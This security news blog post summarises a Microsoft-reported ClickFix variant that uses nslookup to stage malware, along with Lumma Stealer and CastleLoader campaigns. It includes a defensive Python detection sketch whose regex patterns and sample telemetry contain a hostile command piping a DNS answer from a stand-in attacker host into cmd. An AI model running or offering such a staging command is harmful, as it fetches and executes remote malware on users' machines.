Microsoft Warns of DNS-Based ClickFix Attacks Targeting Windows Users

  • 4 days ago
  • 2 min read

Key Findings


  • Microsoft has disclosed details of a new version of the ClickFix social engineering tactic that uses DNS lookups to retrieve malware payloads.

  • The attack tricks users into running commands through the Windows Run dialog that perform a DNS lookup to an external server controlled by the attackers.

  • The DNS response is then executed as the second-stage payload, allowing the threat actors to reach infrastructure under their control and establish a new validation layer.

  • The downloaded payload initiates an attack chain leading to the deployment of ModeloRAT, a Python-based remote access trojan.

  • The malware also creates a Windows shortcut (LNK) file in the Startup folder to establish persistence.

  • Bitdefender has warned of a surge in Lumma Stealer activity driven by ClickFix-style fake CAPTCHA campaigns that distribute an AutoIt version of CastleLoader.

  • CastleLoader is a malware loader associated with the GrayBravo threat actor group, incorporating checks to bypass security solutions before launching the stealer.


Background


ClickFix is an increasingly popular social engineering tactic that tricks unsuspecting users into running commands to infect their own machines with malware, allowing threat actors to bypass security controls. The method has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.


DNS-Based Malware Staging


  • The latest DNS-based ClickFix attack uses the `nslookup` command to perform a DNS lookup against a hard-coded external server, rather than the system's default resolver.

  • The DNS response is filtered to extract the `Name:` field, which is then executed as the second-stage payload.

  • This approach reduces the dependency on traditional web requests and helps blend the malicious activity into normal network traffic.
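As an added illustration (not part of the original post or of Microsoft's guidance), the following Python sketch scores process-creation telemetry for the chain just described: `nslookup` pointed at an explicit server, its output filtered for the `Name:` field, and the filtered answer handed to an interpreter. The `ProcEvent` record, its field names and the sample events are constructed assumptions; the host names and addresses are placeholders, not indicators.

```python
import re
from dataclasses import dataclass

# Hypothetical process-creation record (the fields Sysmon event ID 1 or EDR telemetry would carry).
@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

# Indicators taken from the staging chain described above.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b", re.I)
EXPLICIT_SERVER_RE = re.compile(  # nslookup [-options] <query> <server>: a second positional argument
    r"\bnslookup(?:\.exe)?(?:\s+-\S+)*\s+[^\s|&^<>'-][^\s|&^<>']*\s+[^\s|&^<>'-][^\s|&^<>']*", re.I)
NAME_FILTER_RE = re.compile(r"\b(?:findstr|find|select-string)\b[^|]*\bName\b", re.I)
INTERPRETER_RE = re.compile(r"\b(?:cmd|powershell|pwsh|mshta|wscript|cscript)(?:\.exe)?\b", re.I)

def analyze(ev: ProcEvent) -> dict:
    """Return the matched indicators and whether the event should raise an alert."""
    cl = ev.command_line
    hit = NSLOOKUP_RE.search(cl)
    if not hit:
        return {"alert": False, "reasons": []}
    reasons = []
    if EXPLICIT_SERVER_RE.search(cl):
        reasons.append("explicit_dns_server")            # alone this is ordinary admin troubleshooting
    flt = NAME_FILTER_RE.search(cl, hit.end())
    if flt:
        reasons.append("name_field_filter")
        if INTERPRETER_RE.search(cl, flt.end()):          # an interpreter appears after the filter
            reasons.append("dns_answer_fed_to_interpreter")
    if ev.parent_image.lower().endswith("explorer.exe"):  # Run-dialog launches are children of explorer
        reasons.append("parent_is_explorer")
    # Alert only on the staging pattern itself, so a plain "nslookup host server" stays quiet.
    return {"alert": "name_field_filter" in reasons and len(reasons) >= 2, "reasons": reasons}

# Constructed sample telemetry (.invalid names and TEST-NET addresses are placeholders).
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe",
              "cmd.exe /c nslookup -type=TXT attacker-host.invalid 203.0.113.10 | findstr Name: | cmd"),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\nslookup.exe",
              "nslookup mail.corp.invalid 10.0.0.53"),
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe",
              "cmd.exe /c ipconfig /flushdns"),
]

def run_demo() -> list:
    return [analyze(ev) for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, run_demo()):
        print("ALERT" if res["alert"] else "ok   ", ev.command_line, res["reasons"])
```

The second sample shows the caveat a practitioner needs: an explicit server on its own is routine troubleshooting, so the rule keys on the `Name:` filter plus at least one further indicator.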


Lumma Stealer Campaigns


  • Bitdefender has observed a surge in Lumma Stealer activity, driven by ClickFix-style fake CAPTCHA campaigns that deploy an AutoIt version of CastleLoader.

  • CastleLoader incorporates checks to determine the presence of virtualization software and security programs before decrypting and launching the stealer malware in memory.

  • Websites advertising cracked software and pirated movies also serve as bait for CastleLoader-based attack chains, deceiving users into downloading rogue installers or executables.

  • Lumma Stealer operations have demonstrated resilience, rapidly migrating to new hosting providers and adopting alternative loaders and delivery techniques.


Conclusion


The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities, as the instructions often resemble troubleshooting steps or verification workarounds that users may have encountered previously. This highlights the importance of user awareness and the need for robust security measures to protect against such social engineering attacks.


Sources


  • https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

  • https://x.com/TheCyberSecHub/status/2023050328518873213

  • https://x.com/AdliceSoftware/status/2023064774435541163

  • https://www.cypro.se/2026/02/15/microsoft-discloses-dns-based-clickfix-attack-using-nslookup-for-malware-staging/

  • https://www.ctrlaltnod.com/news/microsoft-warns-of-dns-based-clickfix-attacks-on-windows-users/

© 2025 by Explain IT Again. Powered and secured by Wix